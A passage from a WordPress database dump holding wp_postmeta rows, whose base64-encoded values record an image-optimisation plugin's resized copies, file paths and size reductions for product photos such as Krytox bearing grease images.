J1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQSUtVUkUtMzEwMC1tYXJpbmUtMTgweDE4MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUElLVVJFLTMxMDAtbWFyaW5lLTE4MHgxODAuanBnIiwid2lkdGgiOiIxODAiLCJoZWlnaHQiOiIxODAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRVBJS1VSRS0zMTAwLW1hcmluZS0xODB4MTgwLmpwZyIsInJlZHVjdGlvbiI6NDM4LCJ0aW1lIjoxNDgzNTc3MzU3LCJpZCI6MTA1M30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQSUtVUkUtMzEwMC1tYXJpbmUtMjQ3eDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUElLVVJFLTMxMDAtbWFyaW5lLTI0N3gzMDAuanBnIiwid2lkdGgiOiIyNDciLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRVBJS1VSRS0zMTAwLW1hcmluZS0yNDd4MzAwLmpwZyIsInJlZHVjdGlvbiI6NTEzLCJ0aW1lIjoxNDgzNTc3MzYwLCJpZCI6MTA1M30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQSUtVUkUtMzEwMC1tYXJpbmUtMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUElLVVJFLTMxMDAtbWFyaW5lLTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRVBJS1VSRS0zMTAwLW1hcmluZS0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6NDkyLCJ0aW1lIjoxNDgzNTc3MzY0LCJpZCI6MTA1M30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQSUtVUkUtMzEwMC1tYXJpbmUtNDAweDQwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUElLVVJFLTMxMDAtbWFyaW5lLTQwMHg0MDAuanBnIiwid2lkdGgiOiI0MDAiLCJoZWlnaHQiOiI0MDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRVBJS1VSRS0zMTAwLW1hcmluZS00MDB4NDAwLmpwZyIsInJlZHVjdGlvbiI6NjQzLCJ0aW1lIjoxNDgzNTc3MzY4LCJpZCI6MTA1M31d'); 
INSERT INTO `wp_postmeta` VALUES (29800, 1052, 'wpfc_optimisation_reduction', '12250'); 
INSERT INTO `wp_postmeta` VALUES (29801, 1052, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctZ3JlYXNlNi5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLWdyZWFzZTYuanBnIiwid2lkdGgiOjUwMDAsImhlaWdodCI6MzMzMywibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU3NzM3MywiaWQiOiIxMDUyIn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1ncmVhc2U2LTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctZ3JlYXNlNi0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLWdyZWFzZTYtMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjU2NiwidGltZSI6MTQ4MzU3NzM3NiwiaWQiOjEwNTJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctZ3JlYXNlNi04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLWdyZWFzZTYtODAweDUzMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1ncmVhc2U2LTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoxMTA0LCJ0aW1lIjoxNDgzNTc3MzgwLCJpZCI6MTA1Mn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1ncmVhc2U2LTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctZ3JlYXNlNi03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLWdyZWFzZTYtNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjEwMTgsInRpbWUiOjE0ODM1NzczODQsImlkIjoxMDUyfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLWdyZWFzZTYtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctZ3JlYXNlNi0xNjAweDEwNjcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctZ3JlYXNlNi0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjozOTY5LCJ0aW1lIjoxNDgzNTc3Mzg5LCJpZCI6MTA1Mn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1ncmVhc2U2LTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctZ3JlYXNlNi0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLWdyZWFzZTYtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjU0MCwidGltZSI6MTQ4MzU3NzM5MiwiaWQiOjEwNTJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctZ3JlYXNlNi0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLWdyZWFzZTYtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1ncmVhc2U2LTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjo0NDYsInRpbWUiOjE0ODM1NzczOTYsImlkIjoxMDUyfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLWdyZWFzZTYtMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1ncmVhc2U2LTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctZ3JlYXNlNi0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6NDkyLCJ0aW1lIjoxNDgzNTc3Mzk5LCJpZCI6MTA1Mn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1ncmVhc2U2LTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctZ3JlYXNlNi01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLWdyZWFzZTYtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjc3NCwidGltZSI6MTQ4MzU3NzQwMywiaWQiOjEwNTJ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1ncmVhc2U2LTExNHgxMzAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctZ3JlYXNlNi0xMTR4MTMwLmpwZyIsIndpZHRoIjoiMTE0IiwiaGVpZ2h0IjoiMTMwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLWdyZWFzZTYtMTE0eDEzMC5qcGciLCJyZWR1Y3Rpb24iOjQ0MywidGltZSI6MTQ4MzU3NzQwNiwiaWQiOjEwNTJ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1ncmVhc2U2LTE2MHgxNjAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctZ3JlYXNlNi0xNjB4MTYwLmpwZyIsIndpZHRoIjoiMTYwIiwiaGVpZ2h0IjoiMTYwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLWdyZWFzZTYtMTYweDE2MC5qcGciLCJyZWR1Y3Rpb24iOjQ2NSwidGltZSI6MTQ4MzU3NzQwOSwiaWQiOjEwNTJ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1ncmVhc2U2LTE4MHgxODAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctZ3JlYXNlNi0xODB4MTgwLmpwZyIsIndpZHRoIjoiMTgwIiwiaGVpZ2h0IjoiMTgwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLWdyZWFzZTYtMTgweDE4MC5qcGciLCJyZWR1Y3Rpb24iOjU1NSwidGltZSI6MTQ4MzU3NzQxMywiaWQiOjEwNTJ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1ncmVhc2U2LTI0N3gzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctZ3JlYXNlNi0yNDd4MzAwLmpwZyIsIndpZHRoIjoiMjQ3IiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLWdyZWFzZTYtMjQ3eDMwMC5qcGciLCJyZWR1Y3Rpb24iOjU2NiwidGltZSI6MTQ4MzU3NzQxNiwiaWQiOjEwNTJ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1ncmVhc2U2LTMwMHgzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctZ3JlYXNlNi0zMDB4MzAwLmpwZyIsIndpZHRoIjoiMzAwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLWdyZWFzZTYtMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjYzNiwidGltZSI6MTQ4MzU3NzQyMCwiaWQiOjEwNTJ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1ncmVhc2U2LTQwMHg0MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctZ3JlYXNlNi00MDB4NDAwLmpwZyIsIndpZHRoIjoiNDAwIiwiaGVpZ2h0IjoiNDAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLWdyZWFzZTYtNDAweDQwMC5qcGciLCJyZWR1Y3Rpb24iOjY3NiwidGltZSI6MTQ4MzU3NzQyNCwiaWQiOjEwNTJ9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (29802, 1051, 'wpfc_optimisation_reduction', '22456'); 
INSERT INTO `wp_postmeta` VALUES (29803, 1051, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctZ3JlYXNlNS5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLWdyZWFzZTUuanBnIiwid2lkdGgiOjUwMDAsImhlaWdodCI6NTAwMCwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU3NzQyOCwiaWQiOiIxMDUxIn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1ncmVhc2U1LTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctZ3JlYXNlNS0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLWdyZWFzZTUtMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjkwOSwidGltZSI6MTQ4MzU3NzQzMiwiaWQiOjEwNTF9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctZ3JlYXNlNS04MDB4ODAwLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6ODAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLWdyZWFzZTUtODAweDgwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1ncmVhc2U1LTgwMHg4MDAuanBnIiwicmVkdWN0aW9uIjoyNDAzLCJ0aW1lIjoxNDgzNTc3NDM2LCJpZCI6MTA1MX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1ncmVhc2U1LTc2OHg3NjguanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo3NjgsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctZ3JlYXNlNS03Njh4NzY4LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLWdyZWFzZTUtNzY4eDc2OC5qcGciLCJyZWR1Y3Rpb24iOjIyNzUsInRpbWUiOjE0ODM1Nzc0NDAsImlkIjoxMDUxfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLWdyZWFzZTUtMTYwMHgxNjAwLmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjE2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctZ3JlYXNlNS0xNjAweDE2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctZ3JlYXNlNS0xNjAweDE2MDAuanBnIiwicmVkdWN0aW9uIjo4MzY1LCJ0aW1lIjoxNDgzNTc3NDQ1LCJpZCI6MTA1MX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1ncmVhc2U1LTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctZ3JlYXNlNS0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLWdyZWFzZTUtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjczMywidGltZSI6MTQ4MzU3NzQ0OCwiaWQiOjEwNTF9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctZ3JlYXNlNS0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLWdyZWFzZTUtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1ncmVhc2U1LTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjo1NzAsInRpbWUiOjE0ODM1Nzc0NTIsImlkIjoxMDUxfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLWdyZWFzZTUtMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwid